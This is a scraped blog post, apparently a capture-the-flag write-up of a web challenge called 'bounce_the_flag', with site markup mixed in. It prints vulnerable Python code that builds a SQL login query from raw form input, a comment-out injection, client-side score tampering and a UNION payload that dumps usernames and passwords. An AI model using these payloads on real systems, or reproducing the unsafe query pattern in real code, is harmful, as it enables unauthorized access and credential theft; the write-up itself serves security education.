![\"\"](\"https:\/\/osu-wams-blogs-uploads.s3.amazonaws.com\/blogs.dir\/4941\/files\/2022\/10\/image.png\")
Awesome! I just got a high score! Time to record this epic win on the Bounce the Flag HOF!<\/p>\n\n\n\n What?! I definitely typed my password in right, but I must not have an account. I’m mad! This piece of gaming history deserves to be on the leaderboard! I’m gonna get this score up on the leaderboard, mark my words.<\/p>\n\n\n\n Luckily, we have access to the source code of the server and have been told ahead of time that the server is vulnerable to SQL injection \ud83d\ude00<\/p>\n\n\n\n Our opportunity lies in the unsanitized username and password field. Submitting<\/p>\n\n\n\n gives us the message “Pfffffft you call that a high score?!! Try again when you score at least 1337 points!”<\/p>\n\n\n\n As the score is held client-side, opening up the dev console and entering If we can modify our username or password to break the SQL request for the stats page, we’re golden. <\/p>\n\n\n\n I had trouble crafting the username statement, so I switched to putting the exploit in the password, with the final exploit being:<\/p>\n\n\n\n <\/p>\n","protected":false},"excerpt":{"rendered":" OSUSEC CTF League is back, baby! And it’s on Mondays! Piping hot writeups are back on the regular menu and we’re getting right into things with a classic SQL injection. The challenge: “Let’s kick things off with one of my favorite classic games: Bounce the Flag! Bounce the flag is an immersive hyper-realistic gaming experience … Continue reading Writeup: bounce_the_flag<\/span><\/a><\/p>\n","protected":false},"author":11809,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[7,9],"class_list":["post-64","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-sql-injection","tag-web"],"_links":{"self":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts\/64","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/users\/11809"}],"replies":[{"embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/comments?post=64"}],"version-history":[{"count":2,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts\/64\/revisions"}],"predecessor-version":[{"id":70,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/posts\/64\/revisions\/70"}],"wp:attachment":[{"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/media?parent=64"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/categories?post=64"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blogs.oregonstate.edu\/paul\/wp-json\/wp\/v2\/tags?post=64"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"\"](\"https:\/\/osu-wams-blogs-uploads.s3.amazonaws.com\/blogs.dir\/4941\/files\/2022\/10\/image-1.png\")
<\/figure>\n\n\n\nusername = request.form['username_input']\npassword = request.form['password_input']\n\nres = sql_fetchall(\n connection,\n f\"\"\"\n SELECT score, game_time\n FROM users\n INNER JOIN games\n ON users.id = games.user_id\n WHERE username = '{username}' AND password = '{password}'\n ORDER BY game_time\n \"\"\"\n )<\/code><\/pre>\n\n\n\nMr. Flag' -- <\/code><\/pre>\n\n\n\nscore=1338<\/code> is enough to log in and save our score.<\/p>\n\n\n\nUsername: Mr. Flag\nPassword ' or 1=1 union select password,username from users -- <\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/osu-wams-blogs-uploads.s3.amazonaws.com\/blogs.dir\/4941\/files\/2022\/10\/image-3.png\")
<\/figure>\n\n\n\n